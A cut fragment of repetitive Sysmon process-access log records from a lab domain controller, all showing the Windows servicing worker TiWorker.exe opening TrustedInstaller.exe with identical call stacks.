b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\